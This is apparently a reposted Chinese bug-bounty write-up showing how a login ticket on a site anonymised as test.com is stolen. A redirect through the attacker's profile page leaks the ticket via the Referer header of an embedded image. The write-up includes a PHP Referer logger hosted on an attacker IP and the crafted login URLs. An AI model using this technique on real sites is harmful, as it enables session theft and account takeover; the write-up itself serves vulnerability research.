实战 | 漏洞挖掘之众测厂商 Ticket劫持漏洞
0x00 前言
文章中的项目地址统一修改为: test.com 保护厂商也保护自己
0x01 前期准备
受害者账号: 18******977 攻击者账号: tsetaaaa
攻击者服务器:123.207.33.78 攻击文件:img_referer.php 访问 url:http://123.207.33.78/img_referer.php 攻击代码: <?php if ($_SERVER['HTTP_REFERER']) { file_put_contents('./img_referer.txt', $_SERVER['HTTP_REFERER'].PHP_EOL, FILE_APPEND); }
0x02 场景
绕不过 service 字段的白名单验证所以换了此方法进行绕过获取
白名单触发:http://yun.test.com/index.php?r=portal/user/login&service=http://baidu.com
白名单通过:http://yun.test.com/index.php?r=portal/user/login&service=http://xxxxxxxxxxx.test.com/
名单做的比较死只允许 *.test.com 跳转进行登录
思考了一下可以找一处可以显示插入图片的地方,利用图片来绕过获取到 ticket
0x03 攻击开始
攻击者空间装扮 url: http://yun.test.com/index.php?r=space/person/show&sid=4c7ccfb4c0b6418b83991a57ccb7175f
攻击者 url: http://yun.test.com/index.php?r=portal/user/login&service=http%3A%2F%2Fyun.test.com%2Findex.php%3Fr%3Dspace%2Fperson%2Fshow%26sid%3D4c7ccfb4c0b6418b83991a57ccb7175f
0x3.2 受害者上线
受害者记得要登录
受害者打开 url: http://yun.test.com/index.php?r=portal/user/login&service=http%3A%2F%2Fyun.test.com%2Findex.php%3Fr%3Dspace%2Fperson%2Fshow%26sid%3D4c7ccfb4c0b6418b83991a57ccb7175f
文章来源:HACK学习呀
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END